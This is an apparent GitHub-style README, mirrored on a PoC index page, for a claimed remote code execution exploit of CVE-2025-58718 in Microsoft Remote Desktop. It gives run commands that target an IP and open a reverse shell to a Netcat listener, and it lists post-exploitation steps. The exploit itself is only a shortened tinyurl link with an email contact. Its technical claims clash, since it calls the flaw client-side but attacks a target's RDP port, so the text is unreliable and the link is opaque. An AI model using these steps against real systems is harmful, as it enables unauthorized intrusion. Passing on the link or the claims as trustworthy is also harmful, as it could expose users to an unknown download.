来源

关联漏洞

介绍

# CVE-2025-58718: Remote Desktop Client RCE

## Disclaimer
This tool is for authorized security testing only. Unauthorized use against systems you do not own or have explicit permission to test is illegal and unethical. The authors are not responsible for misuse.

## Exploit Overview
This exploit targets CVE-2025-58718, a use-after-free vulnerability in the Microsoft Remote Desktop Client, enabling remote code execution over a network. It allows an attacker to execute arbitrary code on vulnerable systems by initiating a malformed RDP connection.

The exploit uses crafted RDP packets to trigger the use-after-free condition during the connection handshake, overwriting heap structures to execute a shellcode payload. The provided script includes a reverse TCP shell payload that connects back to a Netcat listener, granting remote access to the target system.

### Key Technical Details
- **Vulnerability Type**: Use-After-Free in RDP protocol handling.
- **Attack Vector**: Network-based, via TCP/3389 (default RDP port).
- **Prerequisites**: Target has Remote Desktop enabled and exposed; no authentication required for exploit trigger.

### Affected Versions
- Windows 10 (1607, 1809, 21H2, 22H2)
- Windows 11 (22H2, 23H2, 24H2, 25H2)
- Windows Server (2008 SP2/R2 SP1, 2012/R2, 2016, 2019, 2022/23H2, 2025)
- Remote Desktop App Client


## Usage
1. **Prerequisites**:
   - Install Python 3.x and dependencies (`pip install -r requirements.txt`).
   - Ensure Netcat (`nc`) is installed on your system.
   - Generate or customize shellcode for your environment (default provided is x64 reverse TCP).
2. **Setup Listener**:
   - The script automatically starts a Netcat listener on the specified port (default: 4444).
   - Ensure your listener IP is reachable by the target (e.g., public IP or same network).
3. **Run Exploit**:
   - Execute: `python cve-2025-58718.py --target <TARGET_IP> --listener-ip <YOUR_IP> --listener-port 4444`.
   - Example: `python cve-2025-58718.py --target 192.168.1.100 --listener-ip 192.168.1.10 --listener-port 4444`.
4. **Monitor**:
   - Check the Netcat listener output for a reverse shell connection.
   - On success, you’ll receive a command shell with SYSTEM privileges.
5. **Post-Exploitation**:
   - Use the shell for further enumeration or privilege escalation (e.g., `whoami`, `net user`).
  
### Exploit

[href](https://tinyurl.com/yjbh9pbc)

For any inquiries, please email me at: eviedejesu803@gmail.com

文件快照

 [4.0K]  /data/pocs/5258e1d91155fce0fcc607bd003dab94a27c1e0d
└── [2.4K]  README.md

0 directories, 1 file

备注